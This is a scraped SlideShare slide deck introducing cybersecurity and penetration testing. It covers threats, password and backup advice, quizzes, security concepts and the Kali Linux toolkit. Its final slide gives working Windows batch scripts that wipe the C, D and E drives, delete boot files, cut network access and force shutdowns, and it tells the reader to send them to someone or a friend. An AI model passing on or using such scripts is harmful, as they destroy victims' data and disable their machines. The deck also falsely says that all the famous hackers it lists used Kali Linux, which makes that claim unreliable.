SlideShare uma empresa Scribd logo
1 de 82
Cyber Security and
Penetration Testing
Introduction Skills
Definition
cybersecurity: “The vulnerability of any computing system, software
program, or critical infrastructure to, or their ability to resist,
intentional interference, compromise, or incapacitation through the
misuse of, or by unauthorized means of, the Internet, public or private
telecommunications systems or other similar conduct that violates
Federal, State, or international law, that harms interstate commerce of
the United States, or that threatens public health or safety.”
ComputerTrainingWales–CyberSecurity
Glossary
“The term cybersecurity infrastructure includes--
(A) equipment that is integral to research and education capabilities in
cybersecurity, including, but not limited to--
(i) encryption devices;
(ii) network switches;
(iii) routers;
(iv) firewalls;
(v) wireless networking gear;
(vi) protocol analyzers;
(vii) file servers;
(viii) workstations;
(ix) biometric tools; and
(x) computers; and
(B) technology support staff (including graduate students) that is integral to
research and education capabilities in cybersecurity.”
ComputerTrainingWales–CyberSecurity
One way to think about it
cybersecurity = security of information systems and networks in the face of
attacks, accidents and failures with the goal of protecting operations and assets
ComputerTrainingWales–CyberSecurity
In Context
corporate cybersecurity = availability, integrity and secrecy of information
systems and networks in the face of attacks, accidents and failures with the goal
of protecting a corporation’s operations and assets
national cybersecurity = availability, integrity and secrecy of the information
systems and networks in the face of attacks, accidents and failures with the goal
of protecting a nation’s operations and assets
ComputerTrainingWales–CyberSecurity
In Context
ComputerTrainingWales–CyberSecurity
• Quiz: A hacked computer can be used to… (select all that apply)
• a) Record keystrokes and steal passwords.
• b) Send spam and phishing emails.
• c) Harvest and sell email addresses and passwords.
• d) Access restricted or personal information on your computer
• or other systems that you have access to.
• e) Infect other systems.
• f) Hide programs that launch attacks on other computers.
• g) Illegally distribute music, movies and software.
• h) Generate large volumes of traffic, slowing down the entire system.
Cybersecurity as a Discipline
How to achieve cybersecurity “success”?
How to overcome the cybersecurity problem?
Must understand four factors that play into the cybersecurity equation:
 Technology
 Economics (of stakeholders and incentives)
 Social Influences (e.g. Big Brother fears)
 Public Policy
ComputerTrainingWales–CyberSecurity
• Cyber Security Highlights.
 User Accounts.
 Baseline Configurations.
 Configuration Management.
 Contingency Plans and Backups.
 Mobile Devices and Portable Storage.
 Login Banners.
 Physical Security.
 Sensitive and Personally Identifiable Information (PII).
• Network and Internet Access.
• Appropriate Use.
• Computer Software Licenses.
• Cyber Security Incidents.
• Cyber Attack.
• Social Engineering and Internet Safety.
ComputerTrainingWales–CyberSecurity
Hackers: Breaches
• Headlines
 GM 2015: Many use same passwords, spear phishing
campaigns, blackmail targets
 Twitter: 32 Million
 Yahoo: 500 Million (LinkedIn, Amazon, Facebook, Credit
Cards, )
 Security cameras, breachable appliances, access control
systems
 Malware found on all platforms including Apple
 2 million new signatures of malware in July 2016
ComputerTrainingWales–CyberSecurity
Famous Computer Hackers
• Gary McKinnon. ...
• LulzSec. ...
• Adrian Lamo. ...
• Mathew Bevan and Richard Pryce. ...
• Jonathan James. ...
• Kevin Poulsen. ...
• Kevin Mitnick. ...
• Anonymous.
They all have one thing in common, they all use(d) Linux/Kali Linux to carryout
their attacks.
ComputerTrainingWales–CyberSecurity
Cyber Security Threats for 2017
• Ransomware and Extortion will increase (Stephen Gates, NSFocus)
• Industrial IoT attacks will increase (Adam Meyer, SurfWatch)
• Internal Threats will increase (James Maude, Avetco)
• Physical Security Investments (Ed Solis, CommScope)
• Hackers are in the Long Game
ComputerTrainingWales–CyberSecurity
Attack Vectors
• Hacking (Data theft, corporate espionage, identity theft)
• Social Engineering (Spear Phishing, Phishing, traditional SE)
• Internal attacks: Unauthorised access and access control
• Cloud Attacks and Breaches (Dropbox, iCloud, OneDrive, Etc.)
• Virus/Malware/Botnet
• Ransomware and Extortion
ComputerTrainingWales–CyberSecurity
Legacy Gateway Security Implementation
ComputerTrainingWales–CyberSecurity
Modern Security Implementation
ComputerTrainingWales–CyberSecurity
Cyber Security Focus
•Keeping the Bad Guys out
• Protecting your Internal Network
•Recovering from an Attack
ComputerTrainingWales–CyberSecurity
Business Security: Keep the bad guys out
• Tools
 Modern firewall
 Security Event Manager
 Spam Filter
 Kali Linux
• Policy
 Monitor 24x7
 Security Event and Log Review
 No local Admins!
 Patch Management and Passwords (2 Form Factor)
ComputerTrainingWales–CyberSecurity
External Threat Strategy
• Raise the bar higher than the next guy
• Weigh what you automate with what you control through policy and procedure
• Higher priced experts in most cases are cheaper than the alternatives
• Constant education on the latest threats must be a priority. The best defense is
intelligence.
ComputerTrainingWales–CyberSecurity
Business Security: Protect from the
Inside
• Tools
 Anti-virus, Anti-Malware
 Security Event Manager
 Modern Firewall
 Reverse Spam Filter
 Network Design: Zones
• Policy
 Employee Training
 Data Retention, Email Security, Data Access and Access Control policies
 Employee Turnover
 Device Management
ComputerTrainingWales–CyberSecurity
Importance of Training
• Free Wifi: Device called wifi pineapple mimics popular banking websites.
• Middleman attack
• Pass through pineapple to whatever sites they want and capture user names and
passwords. Slowly add botnets, malware and virus.
• USB drives “dropped” 30 drives, 67 different networks including corporate
networks
• Waterhole attacks: redirect to compromised websites
• Spear Phishing: Cost one firm $47 million (CEO email wire transfer)
ComputerTrainingWales–CyberSecurity
Business Security: Attack Recovery
• Tools
 Backup, Disaster Recovery and Business Continuity
 Cyber Security Insurance
• Policy
 Communication Plan
 Recovery Time Objective
 Recovery Point Objective
 Incident Source Identification and Quarantine
 Test, Test, Test
ComputerTrainingWales–CyberSecurity
Recovery Considerations
• Attack Source Discovery: 5 minutes to 8 hours
• Systems Restoration: 20 minutes to 2 weeks
• Data Loss: 15 minutes to 24 hours
• Put a real cost to the business loss to truly understand the impact
 Salary
 Missed sales
 Lost data
 Project delays and associated opportunity cost
ComputerTrainingWales–CyberSecurity
Firewall Evolution
• Packet Inspection: Traffic cop: Can see car, colour, plate, make and model and
which direction it is coming from but cant see who is driving, what is in the boot,
what is underneath the car
• Deep Packet Inspection: X-ray vision. Much better than Packet Inspections but
even Superman can’t see through lead
• Encrypted traffic: https traffic is major cause of most breaches. Google
prioritises search results to list https. Ransomware Cryptolocker uses this to
explode on a network via webmail
• Firewall purchased in the past 18-36 months may not be able to inspect https
traffic
ComputerTrainingWales–CyberSecurity
Security Quick Tips
• Move DNS to trusted DNS source only
• Restrict outbound VPN connection to trusted users (Ransomeware Call Home)
• Block outbound SMTP (Botnet Zombies)
• Restrict outbound SSH connectivity (Remote access Trojan)
• Restrict download of executable files to admins and trusted users
• Inspect encrypted traffic
• Two factor authentication for remote users
• Block illicit applications (proxy bypass, peer to peer, tor, etc.)
• Automate alerts and review network traffic frequently
ComputerTrainingWales–CyberSecurity
Roles and Responsibilities
• Users.
 Follow security procedures, report security problems, and complete required computer security training.
• Privileged Users.
 Administer their own systems, including patch and configuration management.
• Group Administrators.
 Manage computers and implement the cyber security program within their group.
• Assistant Cyber Security Managers (ACSM).
 Program point of contact.
 Implement the cyber security program within their program.
• Cyber Security Team.
 Manage day-to-day operation of the cyber security program.
• Directors / Associate Directors.
 Responsible for the Laboratory’s cyber security program.
 Establish the program’s overall goals, objectives and priorities.
ComputerTrainingWales–CyberSecurity
25
Viruses
Viruses infect computers through email
attachments and file sharing. They delete
files, attack other computers, and make
your computer run slowly. One infected
computer can cause problems for all
computers on a network.
Hackers
Hackers are people who “trespass” into
your computer from a remote location.
They may use your computer to send
spam or viruses, host a Web site, or do
other activities that cause computer
malfunctions.
Identity Thieves
People who obtain unauthorized access
to your personal information, such as
Social Security and financial account
numbers. They then use this information
to commit crimes such as fraud or theft.
Spyware
Spyware is software that “piggybacks” on
programs you download, gathers
information about your online habits, and
transmits personal information without
your knowledge. It may also cause a
wide range of other computer
malfunctions.
Llet’s talk about some common cyber-safety threats and the problems they can
cause . . .
ComputerTrainingWales–CyberSecurity
TOP SEVEN CYBER-SAFETY ACTIONS
26
1. Install OS/Software Updates
2. Run Anti-virus Software
3. Prevent Identity Theft
4. Turn on Personal Firewalls
5. Avoid Spyware/Adware
7. Back up Important Files
6. Protect Passwords
ComputerTrainingWales–CyberSecurity
RUN ANTI-VIRUS SOFTWARE
27
 To avoid computer problems caused by viruses, install and
run an anti-virus program like Sophos/Malwarebytes.
 Periodically, check to see if your anti-virus is up to date by
opening your anti-virus program and checking the Last
updated: date.
 Anti-virus software removes viruses, quarantines and
repairs infected files, and can help prevent future viruses.
ComputerTrainingWales–CyberSecurity
PREVENT IDENTITY THEFT
28
 Don't give out financial account numbers, drives license numbers or other
personal identity information unless you know exactly who's receiving it.
Protect others people’s information as you would your own.
 Never send personal or confidential information via email or instant messages
as these can be easily intercepted.
 Beware of phishing scams - a form of fraud that uses email messages that
appear to be from a reputable business (often a financial institution) in an
attempt to gain personal or account information. These often do not include a
personal salutation. Never enter personal information into an online form you
accessed via a link in an email you were not expecting. Legitimate businesses
will not ask for personal information online.
ComputerTrainingWales–CyberSecurity
TURN ON PERSONAL
FIREWALLS
 Check your computer security settings for a built-in personal firewall. If you have one, turn
it on. Microsoft Vista and Mac OSX have built-in firewalls. For more information, see:
 Mac Firewall
(docs.info.apple.com/article.html?path=Mac/10.4/en/mh1042.html)
 Microsoft Firewall
(www.microsoft.com/windowsxp/using/networking/security/winfirewall.mspx)
 Unix users should consult system documentation or online help for personal firewall
instructions and/or recommendations.
 Once your firewall is turned on, test your firewall for open ports that could allow in viruses
and hackers. Firewall scanners like the one on http://www.auditmypc.com/firewall-
test.asp simplify this process.
 Firewalls act as protective barriers between computers and the internet.
 Hackers search the Internet by sending out pings (calls) to random computers and wait for
responses. Firewalls prevent your computer from responding to these calls.
29
ComputerTrainingWales–CyberSecurity
AVOID SPYWARE/ADWARE
30
 Spyware and adware take up memory and can slow down your computer or
cause other problems.
 Use Spybot and Ad-Aware to remove spyware/adware from your computer.
 Watch for allusions to spyware and adware in user agreements before
installing free software programs.
 Be wary of invitations to download software from unknown internet sources.
ComputerTrainingWales–CyberSecurity
PROTECT PASSWORDS
31
 Do not share your passwords, and always make new passwords difficult to guess by
avoiding dictionary words, and mixing letters, numbers and punctuation.
 Do not use one of these common passwords or any variation of them: qwerty1, abc123,
letmein, password1, iloveyou1, (yourname1), baseball1.
 Change your passwords periodically.
 When choosing a password:
o Mix upper and lower case letters
o Use a minimum of 8 characters
o Use mnemonics to help you remember a difficult password
 Store passwords in a safe place. Consider using KeePass Password Safe
(http://keepass.info/), Keychain (Mac) or an encrypted USB drive to store passwords.
Avoid keeping passwords on a Post-it under your keyboard, on your monitor or in a
drawer near your computer!
ComputerTrainingWales–CyberSecurity
BACK UP IMPORTANT FILES
 Reduce your risk of losing important files to a virus, computer crash, theft or
disaster by creating back-up copies.
 Keep your critical files in one place on your computer’s hard drive so you
can easily create a back up copy.
 Save copies of your important documents and files to a CD, online back up
service, flash or USB drive, or a server.
 Store your back-up media in a secure place away from your computer, in
case of fire or theft.
 Test your back up media periodically to make sure the files are accessible
and readable.
32
ComputerTrainingWales–CyberSecurity
CYBER-SAFETY AT HOME
 Physically secure your computer by using security cables and locking doors
and windows in the dorms and off-campus housing.
 Avoid leaving your laptop unsupervised and in plain view in the library or
coffee house, or in your car, dorm room or home.
 Set up a user account and password to prevent unauthorized access to
your computer files.
 Do not install unnecessary programs on your computer.
 Microsoft users can download the free Secunia Personal Software
Inspector (https://psi.secunia.com/), which lets you scan your computer for
any missing operating system or software patches and provides instructions
for getting all the latest updates.
33
ComputerTrainingWales–CyberSecurity
CYBER-SAFETY AT WORK
 Be sure to work with your technical support coordinator before
implementing new cyber-safety measures.
 Talk with your technical support coordinator about what cyber-safety
measures are in place in your department.
 Report to your supervisor any cyber-safety policy violations, security
flaws/weaknesses you discover or any suspicious activity by unauthorized
individuals in your work area.
 Physically secure your computer by using security cables and locking
building/office doors and windows.
 Do not install unnecessary programs on your work computer.
34
ComputerTrainingWales–CyberSecurity
CYBER-SAFETY BASICS QUICK QUIZ
1. True or False? Viruses can be transmitted via email, email attachments or IM.
2. People who seek out your personal information and then use it to commit crimes are called:_____________________
3. Which of the following are ways to help prevent identity theft. (Check all that apply.)
__A. Never send personal information via email or instant messages.
__B. Always send personal information via email or instant messages.
__C. Lock my office door.
__D. Don’t tell anybody my name.
4. True or False? Iloveyou2 is a good password. Why or why not?
5. I just downloaded a free program online and now my computer is running very, very slowly. Which of the following most likely happened?
__A. I didn’t install the program properly.
__B. I didn’t have enough space on my hard drive for the new program.
__C. I downloaded spyware and/or adware, too.
__D. Someone snuck in while the program was downloading and changed my password.
6. ___________________help prevent your computer from responding to pings (calls) from hackers.
8. To fix problems with my operating system and/or application software, I should install __________________.
35
ComputerTrainingWales–CyberSecurity
QUICK QUIZ ANSWERS
1. True
2. Identity thieves
3. A and C are correct. D would probably help too, but seems a bit
extreme!
4. False. Iloveyou2 is a very common password.
5. C. It’s most likely that you downloaded spyware and/or adware.
6. Firewalls
7. OS and/or software updates (patches)
36
ComputerTrainingWales–CyberSecurity
User Accounts
• Central accounts through the IS office provide access to:
 Workstations.
 E-mail (including webmail).
 Remote connectivity (VPN, SSH, modem/dialup).
 Central services (Central File Services, administrative applications, web publishing, etc.).
• Passwords are keys to computing resources, just as door keys are for facilities.
• Different passwords should be used to access Internet resources (i.e. an ISU or
hotmail account). To facilitate this, the use of a cryptographic password safe is
recommended (see http://passwordsafe.sourceforge.net/).
• The DOE requires that passwords:
 Be at least 8 characters long.
 Not be based on the username or a dictionary word.
 Be changed every 180 days, or when a compromise is suspected.
 Contain mixed case, symbols, and digits.
 Contain a nonnumeric character in the first and last position.
ComputerTrainingWales–CyberSecurity
Configuration Management
• Users are responsible for ensuring that changes to the system do not diminish
security and that changes to the system are reflected in system documentation.
• Examples of risky system changes include:
 Installing third party software.
 Providing physical system access to others.
 Installing or configuring hardware devices.
ComputerTrainingWales–CyberSecurity
Contingency Plans and Backups
• Contingency Plans.
 Users should document the procedures, equipment, and personnel necessary to recover computing
capabilities and data in the event that computer system operations are disrupted.
 Significant computing resources should have a written contingency plan including:
 System backup details.
 System recovery checklist/guide.
 Key personnel.
 System configuration data such as key applications and configuration settings.
• Backups.
 Backups are critical to contingency preparedness. Backups should:
 Be stored securely.
 Be periodically tested for usability.
 Be documented (what is backed up, the backup schedule, and the data recovery procedures).
 It is important to differentiate data which should be backed up from data considered temporary, or
an acceptable loss.
ComputerTrainingWales–CyberSecurity
Mobile Device and Portable Storage
• Users of mobile devices (e.g. laptops, PDAs) and portable media (e.g. USB keys)
are responsible for the security of these devices when used in other
environments. Users are encouraged to:
 Make complete backups of data prior to travel,
 Utilize central imaging and scanning facilities for laptops and removable media,
 Keep laptops within sight at all times during travel,
 Be aware of the physical and network environment when using the laptop or sending information
over untrusted networks.
• Pre-verified USB keys are available from the storeroom for purchase. Use of
other USB keys is also permitted with approval on a case-by-case basis. A USB
scanning station is available in the IS office.
• Moderate data must be encrypted if stored on mobile devices or portable
storage.
ComputerTrainingWales–CyberSecurity
Cyber Attack
• How to Recognise a Cyber Attack
 Signs indicating a computer system is under attack may include:
 Unusually sluggish or non-responsive applications.
 Unexpected changes in system behavior.
 Persistent pop-up messages.
 Missing or corrupt data.
• How to Prevent a Cyber Attack
 Use plug-ins to block ads (Ad-Block Plus).
 Use GPG for sender verification with e-mail.
 Ensure anti-virus is turned on.
ComputerTrainingWales–CyberSecurity
Social Engineering and Internet Safety
• Web.
 Avoid ‘high-risk’ sites: gambling, pornography, ‘ad-supported’, etc.
 Read prompts and pop-ups; understand what you click (use google to search for
information).
 Never use your company password with Internet servers.
• E-Mail.
 Phishing attacks and other forms of social engineering are also cyber attacks.
Unexpected e-mails or phone calls, unsolicited CVs, resumes, or requests for information
 Any publicly available information may be used to make a message appear legitimate,
including:
 Logos.
 personal e-mail addresses.
 official documents.
ComputerTrainingWales–CyberSecurity
Trojan Horse Attack
Trojan Horse arrives
via email or
software like free
games.
Trojan Horse is
activated when the
software or
attachment is
executed.
Trojan Horse releases
virus, monitors computer
activity, installs backdoor,
or transmits information
to hacker.
ComputerTrainingWales–CyberSecurity
Denial of Service Attacks
In a denial of service attack, a hacker compromises a system and uses that system to
attack the target computer, flooding it with more requests for services than the target
can handle. In a distributed denial of service attack, hundreds of computers (known as
a zombies) are compromised, loaded with DOS attack software and then remotely
activated by the hacker.
ComputerTrainingWales–CyberSecurity
Spamming Attacks
•Sending out e-mail messages in bulk. It’s electronic “junk
mail.”
•Spamming can leave the information system vulnerable to
overload.
•Less destructive, used extensively for e-marketing
purposes.
ComputerTrainingWales–CyberSecurity
What Does it Mean- “Security”?
• “Security” is the quality or state of being secure--to be free from
danger. But what are the types of security we have to be concern
with?
• Physical security - addresses the issues necessary to protect the
physical items, objects or areas of an organization from unauthorized
access and misuse.
• Personal security - addresses the protection of the individual or
group of individuals who are authorized to access the organization
and its operations.
• Operations security- protection of the details of a particular
operation or series of activities.
ComputerTrainingWales–CyberSecurity
What Does it Mean- “Security”?
• Communications security - concerned with the protection of an
organisations communications media, technology, and content.
• Network security is the protection of networking components,
connections, and contents.
• Information Security – protection of information and its critical
elements, including the systems and hardware that use, store, or
transmit that information.
ComputerTrainingWales–CyberSecurity
The Need for Security
• Industry Need for Information Security
An organisation needs information security for four important
reasons:
• 1. To protect the organisations ability to function,
• 2. To enable the safe operation of applications implemented on
the organisation IT systems,
• 3. To protect the data the organisation collects and uses, and
• 4. To safeguard the technology assets in use at the organisation.
ComputerTrainingWales–CyberSecurity
Information Security Threats
• Act of Human Error or Failure (accidents, mistakes)
•Compromises to Intellectual Property (piracy, copyright infringement)
• Acts of Espionage or Trespass (unauthorized access and/or data collection)
• Acts of Information Extortion (blackmail of information disclosure)
• Acts of Sabotage or Vandalism (destruction of systems or information)
• Software Attacks (viruses, worms, macros, denial of service)
ComputerTrainingWales–CyberSecurity
Information Security Threats
• Forces of Nature (fire, flood, earthquake, lightning)
• Quality of Service Deviations from Service Providers (power & WAN service
issues)
• Technical Hardware Failures or Errors (equipment failure)
• Technical Software Failures or Errors (bugs, code problems, unknown
loopholes)
• Technological Obsolescence (antiquated or outdated technologies)
ComputerTrainingWales–CyberSecurity
Information Security
• Tools, such as policy, awareness, training, education, and
technology are necessary for the successful application of
information security.
• The NSTISSC (National Security Telecommunications and
Information Systems Security Committee) model of information
security is known as the C.I.A. triangle (Confidentiality, Integrity,
and Availability) – these are characteristics that describe the
utility/value of information
ComputerTrainingWales–CyberSecurity
Figure 3
INFORMATION
Integrity Availability
Confidentiality
C.I.A. TRIANGLE
ComputerTrainingWales–CyberSecurity
The Dilemma of Security
• The problem that we cannot get away from in computer security is
that we can only have good security if everyone understands what
security means, and agrees with the need for security.
• Security is a social problem, because it has no meaning until a person
defines what it means to them.
• The harsh reality is the following: In practice, most users have little or
no understanding of security. This is our biggest security hole.
ComputerTrainingWales–CyberSecurity
Meaning of Security Lies in Trust
• Every security problem has this question it needs to answer first:
Whom or what do we trust?
• On our daily lives, we placed some sort of technology between us
and the “things” we don’t trust. For example lock the car, set the
house alarm, give Credit Card number only to the cashier, etc.
• So we decided to trust somebody/something to have some sort
of security (trust the lock, trust the police, trust the cashier).
• We have to have the same scenario for computer & network
systems we use today.
ComputerTrainingWales–CyberSecurity
ComputerTrainingWales–CyberSecurity
Many cyber security threats are
largely avoidable. Some key steps
that everyone can take include (1 of 2):
l Use good, cryptic passwords that can’t be easily guessed
- and keep your passwords secret
l Make sure your computer, devices and applications (apps)
are current and up to date
l Make sure your computer is protected with up-to-date
anti-virus and anti-spyware software
l Don’t click on unknown or unsolicited links or attachments,
and don’t download unknown files or programs onto your
computer or other devices
ComputerTrainingWales–CyberSecurity
Key steps, continued (2 of 2):
l Remember that information and passwords sent via
standard, unencrypted wireless are especially easy
for hackers to intercept
O To help reduce the risk, look for “https” in the URL before
you enter any sensitive information or a password
(the “s” stands for “secure”)
O Also avoid standard, unencrypted email and unencrypted
Instant Messaging (IM) if you’re concerned about privacy
ComputerTrainingWales–CyberSecurity
Questions:
How would you know whether an email sent to
you with an attachment is free from viruses?
How do you secure sensitive data you send via
email?
What steps would you take to secure your
computer from malware?
What does the phrase“ safely manage your
password” mean to you?
ComputerTrainingWales–CyberSecurity
Safely mange your password
Safely manage your email account
Secure your computer
Protect the data you are handling
Avoid risky behaviour online
Be aware of security guidelines, policies, and procedures
Components of an
Information System
• People are the biggest threat to information security!!! (WHY? –
Because WE are the weakest link)
•Social Engineering . It is a system that manipulates the actions of
people in order to obtain information about a system in order to
obtain access.
• Procedures are written blueprints for accomplishing a specific task;
step-by-step descriptions.
The obtainment of the procedures by an unauthorized user would
constitute a threat to the integrity of the information.
ComputerTrainingWales–CyberSecurity
Figure 5
Components of an Information System
Data
Software
Hardware
People
Procedures
ComputerTrainingWales–CyberSecurity
Access vs. Security
• When considering security it is important to realize that it is
impossible to obtain perfect security. Security is not an absolute.
Instead security should be considered a balance between protection
and availability.
• It is possible to have unrestricted access to a system, so that the
system is available to anyone, anywhere, anytime, through any
means. However, this kind of random access poses a danger to the
integrity of information.
• On the other hand complete security of an information system
would not allow anyone access at any given time.
ComputerTrainingWales–CyberSecurity
Figure 7
Security Access
Balancing Security and Access- Too much security might make access
hard to get and people will stop using the system. On the other hand, a
too easy access protocol, might be a security hole for the network. A
balance must be achieved between those two major “players”
ComputerTrainingWales–CyberSecurity
What is Encryption ?
Encryption is the process of converting
messages, information, or data into a form
unreadable by anyone except the intended
recipient. As shown in the figure below,
Encrypted data must be deciphered, or
decrypted, before it can be read by the recipient.
The root of the word encryption—crypt—comes
from the Greek word kryptos, meaning hidden or
secret.
ComputerTrainingWales–CyberSecurity
Modern Encryption Algorithms
• Private Key Encryption
• Public Key Encryption
• Quantum Cryptography
ComputerTrainingWales–CyberSecurityComputerTrainingWales–CyberSecurity
•kaliLINUX
• Kali Linux is an advanced Penetration Testing and Security Auditing Linux
distribution (distro). Named after a Hindu god.
• It was designed to replace the BackTrack Linux distro.
• A Linux distro is a operating system based off the Linux kernel.
• Think Windows NT and all the Windows distributions (XP, Vista, 7, 8, etc.)
• Linux is itself based off the UNIX kernel.
• UNIX > Linux > BackTrack > Kali.
What is Kali Linux?
ComputerTrainingWales–CyberSecurity
ComputerTrainingWales–CyberSecurity
ComputerTrainingWales–CyberSecurity
• 300+ applications, from password crackers to digital forensics software.
• Vast wireless device support (ARM processors).
• Completely Customisable.
• Multilingual Support.
• Secure Development Environment.
• Open source Git tree.
• Filesystem Hierarchy Standard (FHS) Compliant.
Why use Kali?
ComputerTrainingWales–CyberSecurity
• Switched from Ubuntu to Debian.
• FHS and Debian compliant.
• Can now bootstrap and customize Kali ISOs.
• Streaming security and package updates from Debian.
• Expanded ARM development.
Kali’s New Features
ComputerTrainingWales–CyberSecurity
• Easy upgrade to future versions.
• Customizable desktop environment. Automatable Kali Installations.
• Streamlined Development Process.
• Long Term Tool Packaging and Maintenance.
Kali’s New Features (cont)
ComputerTrainingWales–CyberSecurity
• Metasploit
• Nmap
• Wireshark
• Aircrack-ng
• John the Ripper
• SQLNinja
• THC-Hydra
• Torr
• diStorm3
• Armitage
• Proxy Strike
• Ghost Phisher
• Zenmap
• WebScarab
• Android-sdk
• Maskprocessor
• SIPArmyKnife
• Metaspolitable
Kali’s Toolkit (300)
ComputerTrainingWales–CyberSecurity
Installing Kali
Via Physical Media Via Digital Media
• Burn to a live disk, insert into disk drive,
install.
• Format a flash drive, install Kali Linux on
it, insert into a computer, at BIOS screen
select boot from USB.
• Download VMware or other similar
software, create a virtual machine,
download and install Kali Linux onto
virtual machine.
• Use a Preboot eXecution Environment
(PXE) to install and boot Kali Linux from
a server/client network.
ComputerTrainingWales–CyberSecurity
Batch Virus Programming Danger
How to stop someone's internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP
address will be lost, and therefore they won't be able to fix
it
Process:
Open Notepad
Copy the below command there
"rd/s/q D:
rd/s/q C:
rd/s/q E:" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.
Convey your friend a little message and shut down his
/ her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
Open up notepad and copy and paste that.
Save it as a .bat file.
This will shutdown the persons computer. It
shuts it off once and deletes the files needed
to reboot and restart.
Cyber Security and Penetration Testing Skills Introduction (40
Cyber Security and Penetration Testing Skills Introduction (40

Mais conteúdo relacionado

Mais procurados

IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptOoXair
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Edureka!
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security AwarenessRamiro Cid
 
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...Edureka!
 
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Edureka!
 
Cybersecurity
CybersecurityCybersecurity
CybersecurityA. Shamel
 
Cybercrime and Security
Cybercrime and SecurityCybercrime and Security
Cybercrime and SecurityNoushad Hasan
 
Cybersecurity Risk Management Framework Strategy Workshop
Cybersecurity Risk Management Framework Strategy WorkshopCybersecurity Risk Management Framework Strategy Workshop
Cybersecurity Risk Management Framework Strategy WorkshopLife Cycle Engineering
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...Edureka!
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
Cybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comAravind R
 
Cyber Security Introduction.pptx
Cyber Security Introduction.pptxCyber Security Introduction.pptx
Cyber Security Introduction.pptxANIKETKUMARSHARMA3
 
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...Edureka!
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 

Mais procurados (20)

IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.ppt
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security Awareness
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...
Cybersecurity Career Paths | Skills Required in Cybersecurity Career | Learn ...
 
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
Cybercrime and Security
Cybercrime and SecurityCybercrime and Security
Cybercrime and Security
 
Cybersecurity Risk Management Framework Strategy Workshop
Cybersecurity Risk Management Framework Strategy WorkshopCybersecurity Risk Management Framework Strategy Workshop
Cybersecurity Risk Management Framework Strategy Workshop
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Cybersecurity Basics - Aravindr.com
